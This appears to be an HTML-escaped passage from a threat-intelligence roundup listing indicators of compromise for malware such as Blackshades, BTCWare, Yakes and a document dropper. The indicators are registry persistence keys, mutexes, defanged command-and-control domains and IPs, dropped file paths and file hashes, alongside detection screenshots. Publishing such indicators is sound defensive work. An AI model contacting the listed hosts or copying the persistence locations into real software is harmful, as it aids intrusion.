Domains&lt;/li&gt;&lt;li&gt;adtejoyo1377[.]tk&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%PROGRAMDATA%\[a-z0-9]{8}.exe&lt;/li&gt;&lt;li&gt;%APPDATA%\[a-z0-9]{8}.exe&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-4mLKZYJz0VE/WU1v7J-a-zI/AAAAAAAABHc/eNVrg6JDjNMgHHiFa-yE6_2VNixeCvUPgCLcBGAs/s1600/280a3734efd7e54a32c8719c0efe0365df6b14e8ac54e301736c8ff9829da424_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" src="https://2.bp.blogspot.com/-4mLKZYJz0VE/WU1v7J-a-zI/AAAAAAAABHc/eNVrg6JDjNMgHHiFa-yE6_2VNixeCvUPgCLcBGAs/s320/280a3734efd7e54a32c8719c0efe0365df6b14e8ac54e301736c8ff9829da424_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-PUZNME1Wcc8/WU1v-r4alVI/AAAAAAAABHg/IKxMWNkPX0M5NdiHlAHJZS6Dimg6VCUMwCLcBGAs/s1600/280a3734efd7e54a32c8719c0efe0365df6b14e8ac54e301736c8ff9829da424_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="303" data-original-width="1237" height="97" 
src="https://3.bp.blogspot.com/-PUZNME1Wcc8/WU1v-r4alVI/AAAAAAAABHg/IKxMWNkPX0M5NdiHlAHJZS6Dimg6VCUMwCLcBGAs/s400/280a3734efd7e54a32c8719c0efe0365df6b14e8ac54e301736c8ff9829da424_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-g76l7gH4_bM/WU1wDMhqWTI/AAAAAAAABHk/yKSkAYOeUYoHqjcliz1c5EK591l8dUEHQCLcBGAs/s1600/adtejoyo1377.tk_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="414" data-original-width="1112" height="148" src="https://3.bp.blogspot.com/-g76l7gH4_bM/WU1wDMhqWTI/AAAAAAAABHk/yKSkAYOeUYoHqjcliz1c5EK591l8dUEHQCLcBGAs/s400/adtejoyo1377.tk_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Blackshades-6327385-1&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;HKU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;HKU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;LVLWU6KG22&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;\Documents and Settings\Administrator\Local 
Settings\Temp\jd7018sy8tv.exe.jpg&lt;/li&gt;&lt;li&gt;%AppData%\D6GM5WGET8&lt;/li&gt;&lt;li&gt;%AppData%\JD7018SY8TV.exe.tmp&lt;/li&gt;&lt;li&gt;%AppData%\JD7018SY8TV.exe&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-66KH1jJlEqc/WPEt-Ko8v2I/AAAAAAAAA2g/GrNoHGx8SNUOC06ooqgWLzZkwpmkiUjjgCLcB/s400/amp-threatgrid-esa-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-66KH1jJlEqc/WPEt-Ko8v2I/AAAAAAAAA2g/GrNoHGx8SNUOC06ooqgWLzZkwpmkiUjjgCLcB/s400/amp-threatgrid-esa-only.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-wGQI5lqyHzQ/WU1wIn2SvVI/AAAAAAAABHo/V6rYEdG96yojrBrPjnD9Gkf4y6CkQilrQCLcBGAs/s1600/Amp_Blackshades.png" imageanchor="1" style="margin-left: 1em; margin-right: 
1em;"&gt;&lt;img border="0" data-original-height="241" data-original-width="351" height="218" src="https://3.bp.blogspot.com/-wGQI5lqyHzQ/WU1wIn2SvVI/AAAAAAAABHo/V6rYEdG96yojrBrPjnD9Gkf4y6CkQilrQCLcBGAs/s320/Amp_Blackshades.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-IhapRwIA1l8/WU1wNMYBSpI/AAAAAAAABHs/oWmCq0wy6bcH-0ffFKc9m6FH98Z2RfSWwCLcBGAs/s1600/Threatgrid_Blackshades.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="229" data-original-width="847" height="107" src="https://4.bp.blogspot.com/-IhapRwIA1l8/WU1wNMYBSpI/AAAAAAAABHs/oWmCq0wy6bcH-0ffFKc9m6FH98Z2RfSWwCLcBGAs/s400/Threatgrid_Blackshades.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Ransomware.BTCWare-6329927-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;ONYONLOCK&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%WinDir%\SoftwareDistribution\DataStore\DataStore.edb&lt;/li&gt;&lt;li&gt;%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk&lt;/li&gt;&lt;li&gt;%System32%\config\SysEvent.Evt&lt;/li&gt;&lt;li&gt;%System32%\config\WindowsPowerShell.evt&lt;/li&gt;&lt;li&gt;%UserProfile%\Desktop\!#_RESTORE_FILES_#!&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br 
/&gt;&lt;ul&gt;&lt;li&gt;0951b80a41f06f8062c85c80be0276c6a1328edb2a501ed69ed25083303724d2&lt;/li&gt;&lt;li&gt;0b5b4111df2b4b2f78ec053db14ea5c74965ec13f1902570b06697d71a77dcd7&lt;/li&gt;&lt;li&gt;1cde4818229f719153565dd84b01d3927928e7a2b6a61684ee932520f55250a9&lt;/li&gt;&lt;li&gt;3f9b9062ca3497614ac021146b229b07786774934f98a261547b24df5cc5b263&lt;/li&gt;&lt;li&gt;6617035053954a5131d401061c58831e181ddfde221f402029d5ed4bd39561dd&lt;/li&gt;&lt;li&gt;6b4363a419208d6fe093f5a95b55653560d236e1a302f98d22fdfc36488ebcb1&lt;/li&gt;&lt;li&gt;72653d3a882901867143579131a6e9dff2f72a647afe21035c1deda0c4c943b0&lt;/li&gt;&lt;li&gt;741950e9be430267efff601fca1a7c21b65b904658fa46f9e618ea50787faaac&lt;/li&gt;&lt;li&gt;79afde5a759bcd71165b547f7a310fa06674c565a2e81af0304bc1a4527bfa1b&lt;/li&gt;&lt;li&gt;7bd14a6ceacc14e67e84add894d432c6383676ea89265b36515014cd136851e3&lt;/li&gt;&lt;li&gt;7c19bc3a4ad7cddcd78eee053b408779c25a56c9666e9cc9d76ea617aaa0934d&lt;/li&gt;&lt;li&gt;7f86548bdcd97e3faa3e8df0bd6b6aac7c05ed9d445a2bb7973a4d6efd39bd6a&lt;/li&gt;&lt;li&gt;880d25776e08769a75c43bf9a69f9f7cafcc46546690270fa36785195f327d97&lt;/li&gt;&lt;li&gt;8bbaa450526bc2933d462ae24439148273434ff342e0a0774d5e37af4bb16864&lt;/li&gt;&lt;li&gt;97b88ae6bee56ae6193c7908eaabac9be579861868cc575cc345c1d1bca1e302&lt;/li&gt;&lt;li&gt;cef0439b7b483900323614d6cf2eb341019d747aaa0feb81710ef836d330ca9c&lt;/li&gt;&lt;li&gt;d0ab335e86e665edbab58240ae6aa691fa4802ae831c0204e71f90a34ae66983&lt;/li&gt;&lt;li&gt;db5fefc3b8349efa907ed2812c869b10d8de109ff005fe8aac15eaa4c8efdcb8&lt;/li&gt;&lt;li&gt;eb843f4f80ae2e58b569f916239c6208601eece08efb334ae12b8658e3436987&lt;/li&gt;&lt;li&gt;ed3118f96c7e87ea768a40acc574b2ff3cae3a3cdf2419ccb30c750a876d5f30&lt;/li&gt;&lt;li&gt;f7850a2efe397098859d8c3d0ed0b4fa93f87148382e250f094d12f021bc8460&lt;/li&gt;&lt;li&gt;f9d27f4f3231cd80b19b30de4426aecada466e18ee785e82d5afa59e986b4d16&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: 
center;"&gt;&lt;a href="https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s1600/amp-tg-proxy-umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s1600/amp-tg-proxy-umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-pX-R1RCUD6U/WU1wU5x2ghI/AAAAAAAABHw/_Vz4u7WxHeo5CusTXv8IReNzJ5FT8wGsACLcBGAs/s1600/79afde5a759bcd71165b547f7a310fa06674c565a2e81af0304bc1a4527bfa1b_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" src="https://3.bp.blogspot.com/-pX-R1RCUD6U/WU1wU5x2ghI/AAAAAAAABHw/_Vz4u7WxHeo5CusTXv8IReNzJ5FT8wGsACLcBGAs/s320/79afde5a759bcd71165b547f7a310fa06674c565a2e81af0304bc1a4527bfa1b_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-LehONwXbovc/WU1wXYyQPmI/AAAAAAAABH0/WIZUUum7EZETl-A7CdYVogkUMrd2JvCZwCLcBGAs/s1600/79afde5a759bcd71165b547f7a310fa06674c565a2e81af0304bc1a4527bfa1b_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="387" data-original-width="1237" height="125" src="https://3.bp.blogspot.com/-LehONwXbovc/WU1wXYyQPmI/AAAAAAAABH0/WIZUUum7EZETl-A7CdYVogkUMrd2JvCZwCLcBGAs/s400/79afde5a759bcd71165b547f7a310fa06674c565a2e81af0304bc1a4527bfa1b_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" 
style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Doc.Dropper.Agent-6330744-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;wi92[.]js2-order[.]pl&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%AppData%.exe&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;0033b70080a9ee615a371a5c18c373bc9a703a9b5dbcac39a2584a328a49bb87&lt;/li&gt;&lt;li&gt;3a8abf2f7fade51114fde4251ff98b23093e07a7545be3568f3da7ba730bb995&lt;/li&gt;&lt;li&gt;3a93346632f58a112708b761154a170be06de1b6a0583f58053cfb1fce09c780&lt;/li&gt;&lt;li&gt;6465c7ce45a1430e55cf10e43732892a1f86fa90646adf5628dd6d72dd849e8f&lt;/li&gt;&lt;li&gt;6ab9d03a0fc72b377712f262601db2f14561e6f285d9742e956416409bba3e64&lt;/li&gt;&lt;li&gt;8daded1c8acd270c0371e6c24310dacb4d841c801b707594823f371ce601f29b&lt;/li&gt;&lt;li&gt;9b23fd1d89331bddc13063391bea1c03fbaf813a584554cd43b1d6bb6574992a&lt;/li&gt;&lt;li&gt;d19a574a36079ca7885ae142c0f24578743eb98cca7f57df3c2258c8dbb874bc&lt;/li&gt;&lt;li&gt;d31705a64e38340872f6b9e8287e0297d4fd13cb8373295ce0d9ffdf6947e43f&lt;/li&gt;&lt;li&gt;e545a49f26d1482225dd25bf0b2790a1f6d5f96bda9afd90ec8cd38b7b20ec07&lt;/li&gt;&lt;li&gt;f048103ee6f0902b3025729301ce9bbbfee35272bc594be2a6cbd7da72f6f4c4&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" 
height="297" src="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-VMerXo9gmwU/WU1wd2wDrII/AAAAAAAABH4/7CWQB0prd88IYFTLmDBREdVzLaHR5dTTQCLcBGAs/s1600/0033b70080a9ee615a371a5c18c373bc9a703a9b5dbcac39a2584a328a49bb87_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="241" data-original-width="351" height="218" src="https://4.bp.blogspot.com/-VMerXo9gmwU/WU1wd2wDrII/AAAAAAAABH4/7CWQB0prd88IYFTLmDBREdVzLaHR5dTTQCLcBGAs/s320/0033b70080a9ee615a371a5c18c373bc9a703a9b5dbcac39a2584a328a49bb87_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/--mC58kty8yo/WU1wg0p5ZHI/AAAAAAAABH8/A78mV22ukpgMoKZMnmSaDf4rDwlRV67SgCLcBGAs/s1600/0033b70080a9ee615a371a5c18c373bc9a703a9b5dbcac39a2584a328a49bb87_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="618" data-original-width="1151" height="213" src="https://4.bp.blogspot.com/--mC58kty8yo/WU1wg0p5ZHI/AAAAAAAABH8/A78mV22ukpgMoKZMnmSaDf4rDwlRV67SgCLcBGAs/s400/0033b70080a9ee615a371a5c18c373bc9a703a9b5dbcac39a2584a328a49bb87_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a 
href="https://1.bp.blogspot.com/-02uXDajlYQQ/WU1wjnovpuI/AAAAAAAABIA/5XtMo8U_-dwyLTBSy0jn_Sy61N4evUZ8gCLcBGAs/s1600/0033b70080a9ee615a371a5c18c373bc9a703a9b5dbcac39a2584a328a49bb87_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="416" data-original-width="1312" height="126" src="https://1.bp.blogspot.com/-02uXDajlYQQ/WU1wjnovpuI/AAAAAAAABIA/5XtMo8U_-dwyLTBSy0jn_Sy61N4evUZ8gCLcBGAs/s400/0033b70080a9ee615a371a5c18c373bc9a703a9b5dbcac39a2584a328a49bb87_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-ECvfbje4y4c/WU1woljj9sI/AAAAAAAABIE/OVjQaXgwLBM2XiU5945o6xWnSqzOfYq1gCLcBGAs/s1600/0033b70080a9ee615a371a5c18c373bc9a703a9b5dbcac39a2584a328a49bb87_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1197" data-original-width="1600" height="298" src="https://2.bp.blogspot.com/-ECvfbje4y4c/WU1woljj9sI/AAAAAAAABIE/OVjQaXgwLBM2XiU5945o6xWnSqzOfYq1gCLcBGAs/s400/0033b70080a9ee615a371a5c18c373bc9a703a9b5dbcac39a2584a328a49bb87_malware.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Yakes-6330794-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: 
&lt;/b&gt;35bbded46273bc9f6fa3fc5557dba9af&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;35bbded46273bc9f6fa3fc5557dba9af&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\35bbded46273bc9f6fa3fc5557dba9af&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;qazwsxedc&lt;/li&gt;&lt;li&gt;35bbded46273bc9f6fa3fc5557dba9af&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;105[.]154[.]213[.]56&lt;/li&gt;&lt;li&gt;52[.]173[.]193[.]166&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;pokas12[.]ddns[.]net&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%TEMP%\IXP000.TMP\1.xyz&lt;/li&gt;&lt;li&gt;%SystemDrive%\Documents and Settings\Administrator\Start Menu\Programs\Startup\x.vbs&lt;/li&gt;&lt;li&gt;%TEMP%\server.exe&lt;/li&gt;&lt;li&gt;%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br 
/&gt;&lt;ul&gt;&lt;li&gt;be73fc08bed6bba6c25688c150da18e26314c5d670d741d52c457e01f0a1ad0e&lt;/li&gt;&lt;li&gt;f1055f9d223106263dd0d8879be304da2cbe83428c2277a8b42c96c762121a1b&lt;/li&gt;&lt;li&gt;a5024be1b974fc16ca190a26a01bef35e02aceaa4c8fe8a3938084e22d623ce2&lt;/li&gt;&lt;li&gt;eb319d0c53ec709a0482cf58a65b615fcba38a2b44b41e832b4804c6aba68280&lt;/li&gt;&lt;li&gt;75d9b6086aa9bd51596733a163bd568cc648978ac68e7ebdd817654b4c7e6fed&lt;/li&gt;&lt;li&gt;d323180a15cf584a184aa63a0044ec7701cb9d75769386bec21992ffd585d9dc&lt;/li&gt;&lt;li&gt;eeb4c5448c1a4a8723f860c7ce30889c2c5d018abe17df43fae2f6d23a713568&lt;/li&gt;&lt;li&gt;4657c3f05d44048fdfc41190e652413ba2508565aa9185fa1a0670a2536a95cc&lt;/li&gt;&lt;li&gt;c585135463d4fce5053f47c255747524585b98c1c3f8dc305beefa17d2fcfa9e&lt;/li&gt;&lt;li&gt;c99d37d2cfc2861254d1bb82cc6b41617e659e8f0430e63cd20f44778a3bfaac&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-8-ewx032dEo/WShN7e2cmKI/AAAAAAAABAg/1zHeN8V4h-sP6aW4ev8jafnU6MW4QEE0wCLcB/s1600/no-email-security.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://1.bp.blogspot.com/-8-ewx032dEo/WShN7e2cmKI/AAAAAAAABAg/1zHeN8V4h-sP6aW4ev8jafnU6MW4QEE0wCLcB/s1600/no-email-security.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-Wjh0fUhcD78/WU1wzPQMOHI/AAAAAAAABII/UAcOOdz4TOALQA34jWqxLWJ00NyN3zTwQCLcBGAs/s1600/c99d37d2cfc2861254d1bb82cc6b41617e659e8f0430e63cd20f44778a3bfaac_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" 
src="https://2.bp.blogspot.com/-Wjh0fUhcD78/WU1wzPQMOHI/AAAAAAAABII/UAcOOdz4TOALQA34jWqxLWJ00NyN3zTwQCLcBGAs/s320/c99d37d2cfc2861254d1bb82cc6b41617e659e8f0430e63cd20f44778a3bfaac_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-VFvg3MIifjM/WU1w1zwqmOI/AAAAAAAABIM/ROrNUTHHJVY-uwOIrb9Nz4uEwwPJWGYEQCLcBGAs/s1600/c99d37d2cfc2861254d1bb82cc6b41617e659e8f0430e63cd20f44778a3bfaac_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="975" data-original-width="1237" height="315" src="https://3.bp.blogspot.com/-VFvg3MIifjM/WU1w1zwqmOI/AAAAAAAABIM/ROrNUTHHJVY-uwOIrb9Nz4uEwwPJWGYEQCLcBGAs/s400/c99d37d2cfc2861254d1bb82cc6b41617e659e8f0430e63cd20f44778a3bfaac_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/--fAH3wGpXMc/WU1w5sgkH2I/AAAAAAAABIQ/q8EgasZaF2Yv0WFQKlgPwi-pW-nJ8QhUwCLcBGAs/s1600/pokas12.ddns.net_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="414" data-original-width="1112" height="148" src="https://1.bp.blogspot.com/--fAH3wGpXMc/WU1w5sgkH2I/AAAAAAAABIQ/q8EgasZaF2Yv0WFQKlgPwi-pW-nJ8QhUwCLcBGAs/s400/pokas12.ddns.net_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Ransomware.Locky-6330799-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry 